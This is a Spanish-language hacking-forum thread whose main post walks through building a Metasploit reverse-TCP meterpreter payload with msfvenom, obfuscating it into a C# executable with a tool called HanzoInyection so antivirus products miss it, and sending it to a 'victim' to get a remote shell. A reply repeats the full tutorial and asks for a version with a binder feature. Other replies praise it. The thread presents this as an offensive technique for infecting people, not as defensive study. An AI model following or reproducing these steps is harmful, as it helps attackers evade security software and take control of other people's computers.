send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Burlando AV mediante HanzoInyection

  • 3 Respuestas
  • 1963 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    0%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« en: Abril 19, 2016, 06:46:55 pm »
Buenas tardes soy nuevo en el foro mi seudonimo es Browsernet, tengo un blog algo conocido, creo que muchos de esta comunidad lo han visto.
Estare colgado contenido de mi autoria cada dia.

¿me preguntaran porque me uni a underc0de?

Yo humildemente respondere porque aqui "Estan los mejores"
#Saludos para todos,




Saludos mis fieles lectores en esta oportunidad vamos a convertir nuestra payload de Metasploit Framework creado en C# a executable con una herramienta poco conocida con algo de antigüedad llamada "HanzoInyection" que compila y codifica el código malicioso para hacerlos in-detectables de todos los Anti-Virus,

Descarga:
You are not allowed to view links. Register or Login

root@You are not allowed to view links. Register or Login:~# git clone You are not allowed to view links. Register or Login



una ves descargado el código pasaremos a ejecutar el  hanzoInyection.exe con la herramienta wine, aclarando lo siguiente la herramienta es multi plataforma, ya que puede ser utilizada en Windows y en Gnu/Linux.

Pero antes de utilizarlo, debemos crear nuestro payload en extensión .bin

root@You are not allowed to view links. Register or Login:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.217.128 lport=8080 -t raw -o /root/meterpreter.bin



ya creado nuestro archivo, lo que haremos sera subir el payload "meterpreter.bin" a una web donde lo analice con todas las firmas de los Anti-Virus:

 

 

Como vemos solamente 2 Antivirus de 35 lo han detectado las cuales fueron "AVG y Clan Antivirus", continuando con lo siguiente el archivo meterpreter.bin se encuentra en la carpeta "ROOT", lo que haremos sera copiar dicho archivo a la carpeta hanzoInyection, de esta manera.

Para ejecutar  el archivo debemos añadir lo siguiente:

root@You are not allowed to view links. Register or Login:~/hanzoInjection# wine HanzoInjection.exe



Como podemos observar  nos muestra las opciones de dicha herramienta, entonces vamos a compilar nuestro archivo con extensión .bin  meterpreter.bin a extensión .cs = meterpreter.cs



root@You are not allowed to view links. Register or Login:~/hanzoInjection# wine HanzoInjection.exe -p meterpreter.bin -o meterpreter.cs

Como vemos se ha compilado correctamente el código, lo que haremos sera abrir el código en leafpad para copiar toda la fuente el archivo meterpreter.cs

root@You are not allowed to view links. Register or Login:~/hanzoInjection# leafpad meterpreter.cs



Ya copiado  todo el código, abriremos otra terminal y ejecutaremos un editor de programación llamado "monodevelop".

 root@You are not allowed to view links. Register or Login:~#monodevelop



Ya abierto la plataforma vamos a dirigirnos a la pestaña "C#" y le daremos en el primer escenario "Proyecto de consola" luego escogemos el nombre y la ubicación donde se guardara nuestro proyecto,  en mi caso se llama "facebook" como podemos ver nos carga la ventada con el código Java, que llega por Defauld.



Ahora pasaremos a pegar el código mencionado hace momentos meterpreter.cs



Ya copiado el código, lo que haremos sera añadir un paquete del inicio "XML" para validar la variable en uso System.Xml



Nos iremos a la pestaña "Referencias" > Editar



Ahora buscaremos el paquete System.Xml, activaremos la casilla y le damos "Aceptar"



Ya terminado con la agregación de los paquetes, XML lo que haremos sera validar el código inseguro que no aceptara al compilar el ejecutable, las cuales son las siguientes lineas:




Nos dirigiremos a la pestaña de herramientas "Proyecto" > Opciones de Facebook y haremos los siguientes procedimientos para permitir el "Bodigo inseguro"


Una ves terminado la configuración le daremos la tecla "F8" para crear nuestro archivo ejecutable, la cual estará en la ruta del proyecto que elegimos :)





lo que haré sera activar nuestro servidor de escucha de msfconsole, con el puerto que hemos elegido al crear nuestro payload en msfvenom este caso: 8080.



Subiremos el archivo a la web de análisis, para comprobar si funciono nuestro proceso correctamente.



Como vemos es totalmente "FUD", ahora que ya tenemos nuestro archivo le enviaremos a nuestra victima:



Nuestra victima acaba de abrir nuestro archivo y como el resultado no puede ser otro jaja, lo tenemos funcionando burlando al Malware Bytes Premium, Malwarebytes Anti-Exploit,  Avast Premier, IObit Malware Fighter, Advanced SystemCare Ultimate 9.



Gracias por visitar este POST.
« Última modificación: Abril 19, 2016, 07:39:11 pm por rollth »

Conectado n0z

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    3.33%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Abril 19, 2016, 10:00:40 pm »
muy bueno y simple tu post browsernet,gracias por el aporte. Lo voy a tratar en par de dias a ver que tal hermano

Desconectado lapizacapuntas

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: rootcrazy-hsh
« Respuesta #2 en: Mayo 05, 2016, 07:43:58 pm »
muy bueno el post ... lo probare... +10 gracias por compartir el segundo bien mas preciado del universo ... EL CONOCIMIENTO

Desconectado basharbachir

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Noviembre 08, 2017, 05:05:07 am »
You are not allowed to view links. Register or Login
Buenas tardes soy nuevo en el foro mi seudonimo es Browsernet, tengo un blog algo conocido, creo que muchos de esta comunidad lo han visto.
Estare colgado contenido de mi autoria cada dia.

¿me preguntaran porque me uni a underc0de?

Yo humildemente respondere porque aqui "Estan los mejores"
#Saludos para todos,




Saludos mis fieles lectores en esta oportunidad vamos a convertir nuestra payload de Metasploit Framework creado en C# a executable con una herramienta poco conocida con algo de antigüedad llamada "HanzoInyection" que compila y codifica el código malicioso para hacerlos in-detectables de todos los Anti-Virus,

Descarga:
You are not allowed to view links. Register or Login

root@You are not allowed to view links. Register or Login:~# git clone You are not allowed to view links. Register or Login



una ves descargado el código pasaremos a ejecutar el  hanzoInyection.exe con la herramienta wine, aclarando lo siguiente la herramienta es multi plataforma, ya que puede ser utilizada en Windows y en Gnu/Linux.

Pero antes de utilizarlo, debemos crear nuestro payload en extensión .bin

root@You are not allowed to view links. Register or Login:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.217.128 lport=8080 -t raw -o /root/meterpreter.bin



ya creado nuestro archivo, lo que haremos sera subir el payload "meterpreter.bin" a una web donde lo analice con todas las firmas de los Anti-Virus:

 

 

Como vemos solamente 2 Antivirus de 35 lo han detectado las cuales fueron "AVG y Clan Antivirus", continuando con lo siguiente el archivo meterpreter.bin se encuentra en la carpeta "ROOT", lo que haremos sera copiar dicho archivo a la carpeta hanzoInyection, de esta manera.

Para ejecutar  el archivo debemos añadir lo siguiente:

root@You are not allowed to view links. Register or Login:~/hanzoInjection# wine HanzoInjection.exe



Como podemos observar  nos muestra las opciones de dicha herramienta, entonces vamos a compilar nuestro archivo con extensión .bin  meterpreter.bin a extensión .cs = meterpreter.cs



root@You are not allowed to view links. Register or Login:~/hanzoInjection# wine HanzoInjection.exe -p meterpreter.bin -o meterpreter.cs

Como vemos se ha compilado correctamente el código, lo que haremos sera abrir el código en leafpad para copiar toda la fuente el archivo meterpreter.cs

root@You are not allowed to view links. Register or Login:~/hanzoInjection# leafpad meterpreter.cs



Ya copiado  todo el código, abriremos otra terminal y ejecutaremos un editor de programación llamado "monodevelop".

 root@You are not allowed to view links. Register or Login:~#monodevelop



Ya abierto la plataforma vamos a dirigirnos a la pestaña "C#" y le daremos en el primer escenario "Proyecto de consola" luego escogemos el nombre y la ubicación donde se guardara nuestro proyecto,  en mi caso se llama "facebook" como podemos ver nos carga la ventada con el código Java, que llega por Defauld.



Ahora pasaremos a pegar el código mencionado hace momentos meterpreter.cs



Ya copiado el código, lo que haremos sera añadir un paquete del inicio "XML" para validar la variable en uso System.Xml



Nos iremos a la pestaña "Referencias" > Editar



Ahora buscaremos el paquete System.Xml, activaremos la casilla y le damos "Aceptar"



Ya terminado con la agregación de los paquetes, XML lo que haremos sera validar el código inseguro que no aceptara al compilar el ejecutable, las cuales son las siguientes lineas:




Nos dirigiremos a la pestaña de herramientas "Proyecto" > Opciones de Facebook y haremos los siguientes procedimientos para permitir el "Bodigo inseguro"


Una ves terminado la configuración le daremos la tecla "F8" para crear nuestro archivo ejecutable, la cual estará en la ruta del proyecto que elegimos :)





lo que haré sera activar nuestro servidor de escucha de msfconsole, con el puerto que hemos elegido al crear nuestro payload en msfvenom este caso: 8080.



Subiremos el archivo a la web de análisis, para comprobar si funciono nuestro proceso correctamente.



Como vemos es totalmente "FUD", ahora que ya tenemos nuestro archivo le enviaremos a nuestra victima:



Nuestra victima acaba de abrir nuestro archivo y como el resultado no puede ser otro jaja, lo tenemos funcionando burlando al Malware Bytes Premium, Malwarebytes Anti-Exploit,  Avast Premier, IObit Malware Fighter, Advanced SystemCare Ultimate 9.



Gracias por visitar este POST.

thanks alot but the new source in github has not binder option -b
can any one please to upload the old one ?

 

¿Te gustó el post? COMPARTILO!